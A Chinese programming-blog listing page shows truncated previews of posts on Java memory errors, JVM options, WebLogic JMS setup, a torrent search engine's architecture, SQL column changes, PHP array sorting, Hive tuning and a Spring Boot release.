    Java内存溢出详解   一、常见的Java内存溢出有以下三种:   1. java.lang.OutOfMemoryError: Java heap space ----JVM Heap(堆)溢出JVM在启动的时候会自动设置JVM Heap的值,其初始空间(即-Xms)是物理内存的1/64,最大空间(-Xmx)不可超过物理内存。 可以利用JVM提
  • Java6 JVM参数选项 greatwqs javaHotSpotjvmjvm参数JVM Options
    Java 6 JVM参数选项大全(中文版)   作者:Ken Wu Email: [email protected] 转载本文档请注明原文链接 http://kenwublog.com/docs/java6-jvm-options-chinese-edition.htm!   本文是基于最新的SUN官方文档Java SE 6 Hotspot VM Opt
  • weblogic创建JMC i5land weblogicjms
    进入 weblogic控制太 1.创建持久化存储 --Services--Persistant Stores--new--Create FileStores--name随便起--target默认--Directory写入在本机建立的文件夹的路径--ok 2.创建JMS服务器 --Services--Messaging--JMS Servers--new--name随便起--Pers
  • 基于 DHT 网络的磁力链接和BT种子的搜索引擎架构 justjavac DHT
    上周开发了一个磁力链接和 BT 种子的搜索引擎 {Magnet & Torrent},本文简单介绍一下主要的系统功能和用到的技术。 系统包括几个独立的部分: 使用 Python 的 Scrapy 框架开发的网络爬虫,用来爬取磁力链接和种子; 使用 PHP CI 框架开发的简易网站; 搜索引擎目前直接使用的 MySQL,将来可以考虑使
  • sql添加、删除表中的列 macroli sql
    添加没有默认值:alter table Test add BazaarType char(1) 有默认值的添加列:alter table Test add BazaarType char(1) default(0) 删除没有默认值的列:alter table Test drop COLUMN BazaarType 删除有默认值的列:先删除约束(默认值)alter table Test DRO
  • PHP中二维数组的排序方法 abc123456789cba 排序二维数组PHP
    <?php/*** @package     BugFree* @version     $Id: FunctionsMain.inc.php,v 1.32 2005/09/24 11:38:37 wwccss Exp $*** Sort an two-dimension array by some level
  • hive优化之------控制hive任务中的map数和reduce数 superlxw1234 hivehive优化
    一、    控制hive任务中的map数: 1.    通常情况下,作业会通过input的目录产生一个或者多个map任务。 主要的决定因素有: input的文件总个数,input的文件大小,集群设置的文件块大小(目前为128M, 可在hive中通过set dfs.block.size;命令查看到,该参数不能自定义修改);2. 
  • Spring Boot 1.2.4 发布 wiselyman spring boot
    Spring Boot 1.2.4已于6.4日发布,repo.spring.io and Maven Central可以下载(推荐使用maven或者gradle构建下载)。   这是一个维护版本,包含了一些修复small number of fixes,建议所有的用户升级。   Spring Boot 1.3的第一个里程碑版本将在几天后发布,包含许多
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他